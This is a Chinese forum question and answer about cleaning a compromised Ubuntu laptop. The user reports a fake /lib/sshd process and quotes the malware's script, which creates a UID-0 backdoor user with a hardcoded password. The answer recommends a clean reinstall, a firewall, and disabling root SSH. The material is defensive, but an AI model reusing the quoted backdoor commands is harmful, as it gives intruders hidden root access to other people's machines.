如何在我的笔记本电脑上处理恶意软件?
我相当肯定我的Ubuntu 13.10笔记本电脑感染了某种恶意软件。
每隔一段时间,我发现一个进程/ lib / sshd(由root拥有)运行并消耗大量的cpu。 它不是运行/ usr / sbin / sshd的sshd服务器。
二进制文件具有–wxrw-rwt权限,它在/ lib目录中生成并生成脚本。 最近的一个名为13959730401387633604,它执行以下操作
#!/bin/sh exec 1>/dev/null exec 2>/dev/null useradd -g 0 -u 0 -o gusr echo gusr:chaonimabi123456123 | chpasswd gusr用户是由恶意软件独立创建的,然后chpasswd在消耗100%cpu时挂起。
到目前为止,我已经确定gusr用户还被添加到/ etc /中的文件
/etc/group /etc/gshadow /etc/passwd /etc/shadow /etc/subgid /etc/subuid
似乎恶意软件使用“ – ”后缀制作了所有这些文件的副本。 可以在此处获取root修改的/ etc / files的完整列表。
此外,/ etc / hosts文件已更改为此 。
/ lib / sshd首先将自己添加到/etc/init.d/rc.local文件的末尾!
我删除了用户,删除了文件,杀死了已处理的树,更改了我的密码并删除了ssh公钥。
我知道我基本上搞砸了,我很可能会重新安装整个系统。 然而,既然我登录了其他几台机器,那么至少尝试将其删除并弄清楚我是如何得到它的。 任何关于如何解决这个问题的建议将不胜感激。
好像他们在3月25日通过强制root登录进入了。 我不知道在Ubuntu中默认启用了root ssh。 我禁用了它并设置了denyhosts。
登录号码是59.188.247.236,显然是在香港的某个地方。
我从EmperorLinux获得了笔记本电脑,他们启用了root访问权限。 如果你有其中一个并且你正在运行sshd要小心。
首先,现在让这台机器离开网络!
其次,为什么你启用了root帐户? 你真的不应该启用root帐户,除非你有充分的理由这样做。
第三,是的,确保你干净的唯一方法是做一个干净的安装。 还建议你重新开始,不要再回到备份,因为你永远无法确定它什么时候开始。
我还建议您在下次安装时设置防火墙并拒绝所有传入连接:
sudo ufw default deny incoming
然后允许ssh:
sudo ufw allow ssh
并且不要启用root帐户! 当然要确保禁用root ssh登录。